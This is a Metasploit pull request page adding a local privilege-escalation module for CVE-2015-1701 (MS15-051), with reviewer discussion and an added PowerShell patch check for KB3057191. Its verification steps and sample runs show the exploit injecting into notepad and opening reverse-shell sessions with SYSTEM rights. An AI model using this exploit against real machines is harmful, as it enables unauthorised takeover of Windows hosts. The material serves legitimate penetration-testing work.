
Add butchered version of CVE-2015-1701 #5466

Merged
merged 271 commits into from Jun 22, 2015

Conversation

OJ
Contributor

@OJ OJ commented Jun 3, 2015

This PR includes the first pass of a module and source that provides a local privilege escalation for CVE-2015-1701 (MS15-051), documented by FireEye.

Code for this module was blatantly purloined from this repository. It has very few adjustments, other than the ones to make it work within the Meterpreter ecosystem. Those changes are:

  • Changing the way some functions are imported.
  • Adding the reflective loader functionality (hooray include collisions!)
  • Adding the DLL entry point which includes the pointer to the shellcode.
  • Wiring in the shellcode invocation at the point where the exploit would normally invoke cmd.exe.

I haven't spent any time tidying the C source up at all. The MSF module is pretty much a direct copy of an existing local exploit module with the appropriate tweaks made.

I have successfully tested this on Windows 7 x64 and x86 (build 7600), and on Windows 2008 R2 SP1 x64, though according to the TechNet articles the vulnerability should work on earlier versions as well.

I'd like to call on the fine minds of @zeroSteiner, @wchen-r7 and @jvazquez-r7 to cast an eye over this. It could use some serious tidying up and you guys are meticulous! Any comments would be appreciated. My feeling is that this can be landed 'as is' without too many changes, and we can spend more time later tidying up the C code if we feel like it.

Note: this PR includes functioning binaries as part of a signed commit.

Verification

  • Get hold of a Windows 7 x86 and/or x64 VM, or Windows 2008 VM that is unpatched (i.e. missing the patch https://support.microsoft.com/kb/3057191).
  • Create a meterpreter session as a non-privileged user.
  • Background the session and load the exploit post module exploit/windows/local/ms15_051_client_copy_image.
  • Configure the post module appropriately for the target in question, and select an appropriate payload.
  • Run the exploit and hopefully you'll see a SYSTEM shell come flying back at you.

Sample Runs

Windows 7 x86

meterpreter > getuid
Server username: dobby-PC\dobby
meterpreter > sysinfo
Computer        : DOBBY-PC
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : en_AU
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > background
[*] Backgrounding session 9...
msf exploit(ms15_051_client_copy_image) > show options

Module options (exploit/windows/local/ms15_051_client_copy_image):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  9                yes       The session to run this module on.


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: , , seh, thread, process, none)
   LHOST     XXX.XXX.XXX.XXX  yes       The listen address
   LPORT     80               yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf exploit(ms15_051_client_copy_image) > run

[*] Launching notepad to host the exploit...
[+] Process 2508 launched.
[*] Reflectively injecting the exploit DLL into 2508...
[*] Injecting exploit into 2508...
[*] Exploit injected. Injecting payload into 2508...
[*] Payload injected. Executing exploit...
[*] Sending stage (884270 bytes) to 120.148.51.167
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 10 opened (10.1.10.40:4444 -> XXX.XXX.XXX.XXX:49159) at 2015-06-03 21:38:12 +1000
msf exploit(ms15_051_client_copy_image) > sessions -i 10
[*] Starting interaction with 10...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DOBBY-PC
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : en_AU
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >

Windows 7 x64

meterpreter > getuid
Server username: WIN-S45GUQ5KGVK\OJ
meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/win64
meterpreter > background
[*] Backgrounding session 5...
msf exploit(ms15_051_client_copy_image) > run

[*] Started reverse handler on 10.1.10.40:4444 
[*] Launching notepad to host the exploit...
[+] Process 856 launched.
[*] Reflectively injecting the exploit DLL into 856...
[*] Injecting exploit into 856...
[*] Exploit injected. Injecting payload into 856...
[*] Payload injected. Executing exploit...
[*] Sending stage (1103410 bytes) to 10.1.10.35
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 6 opened (10.1.10.40:4444 -> 10.1.10.35:49172) at 2015-06-03 20:57:38 +1000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/win64
meterpreter >

Windows 2008 R2 SP1 x64

meterpreter > getuid
Server username: PWNAGE\OJ Reeves
meterpreter > sysinfo
Computer        : WIN2008R2
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : PWNAGE
Logged On Users : 2
Meterpreter     : x64/win64
meterpreter > background
[*] Backgrounding session 12...
msf exploit(ms15_051_client_copy_image) > run

[*] Started reverse handler on 10.1.10.40:5555 
[*] Launching notepad to host the exploit...
[+] Process 444 launched.
[*] Reflectively injecting the exploit DLL into 444...
[*] Injecting exploit into 444...
[*] Exploit injected. Injecting payload into 444...
[*] Payload injected. Executing exploit...
[*] Sending stage (1103410 bytes) to 10.1.10.12
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 13 opened (10.1.10.40:5555 -> 10.1.10.12:49168) at 2015-06-03 22:14:07 +1000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN2008R2
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : PWNAGE
Logged On Users : 2
Meterpreter     : x64/win64
meterpreter > 

Thanks to @multiplex3r for helping out with testing.
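The first verification step above asks for a host that is missing KB3057191. The following PowerShell function is an added example (it is not part of this PR or of the Metasploit module it introduces) that reports whether that specific KB is installed, together with the OS build, so patch state can be confirmed before and after a test. It assumes Windows PowerShell 2.0 or later with WMI reachable on the target; the function and parameter names are this example's own.

```powershell
# Added example, not part of this PR or of the Metasploit module it introduces.
# Reports whether the MS15-051 update (KB3057191, the KB named in the verification
# steps above) is installed on a host. Assumes Windows PowerShell 2.0+ with WMI
# reachable; Test-Ms15051Patch and its parameters are names chosen for this example.
function Test-Ms15051Patch {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [string]$KbId = 'KB3057191'
    )

    # OS identity: version 6.1.7600 is Windows 7 RTM, 6.1.7601 is Windows 7 SP1 /
    # Server 2008 R2 SP1, the builds the PR author reports testing against.
    $os = Get-WmiObject -Class Win32_OperatingSystem -ComputerName $ComputerName

    # Get-HotFix reads Win32_QuickFixEngineering, which lists individually installed
    # updates; no entry means this particular KB was never applied to the host.
    $hotfix = Get-HotFix -Id $KbId -ComputerName $ComputerName -ErrorAction SilentlyContinue

    $installedOn = $null
    if ($hotfix) { $installedOn = $hotfix.InstalledOn }

    New-Object PSObject -Property @{
        ComputerName = $ComputerName
        Caption      = $os.Caption
        OSVersion    = $os.Version
        Architecture = $os.OSArchitecture
        KbId         = $KbId
        Installed    = [bool]$hotfix
        InstalledOn  = $installedOn
    }
}

# Usage: run locally, or pass -ComputerName for a remote host you administer.
Test-Ms15051Patch | Format-List
```

One caveat when reading the result: Windows 7 and Server 2008 R2 hosts that received the monthly rollups introduced in late 2016 carry the fix without listing KB3057191 individually, so `Installed = False` is only conclusive on hosts patched with the standalone security updates of the PR's era.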

zeroSteiner and others added 30 commits May 29, 2015 13:50
This module isn't using report_auth_info, so this comment is no
longer needed.
* Fixes bug with Pro Vuln Validation validation pushes
@OJ
Contributor Author

OJ commented Jun 19, 2015 via email

@wchen-r7 wchen-r7 assigned wchen-r7 and unassigned zeroSteiner Jun 19, 2015
@wchen-r7
Contributor

Cool!

if (huser32 == NULL)
    return 0;

pse = (PSHAREDINFO)GetProcAddress(huser32, "gSharedInfo");
Contributor


My guess is that this is why the exploit is not working on server 2003. user32!gSharedInfo is not available on older versions of Windows.

Contributor Author


Yup, good point.

@wchen-r7 wchen-r7 merged commit 3686acc into rapid7:master Jun 22, 2015
@OJ
Contributor Author

OJ commented Jun 24, 2015

Thanks @wchen-r7 ! I know that @zeroSteiner has more work coming here as well to get things working on some earlier versions.

Cheers for landing :)

@OJ OJ deleted the cve-2015-1701 branch June 24, 2015 00:52
@wchen-r7
Contributor

Cheers!

@vysecurity

Does not seem to work... I always get a "does not support WOW64"...

@OJ
Contributor Author

OJ commented Sep 17, 2015

It works perfectly. Your Meterpreter session must match the target architecture.

@vysecurity

Yep, my bad :) I had to check the source and figure it out. Just migrate...
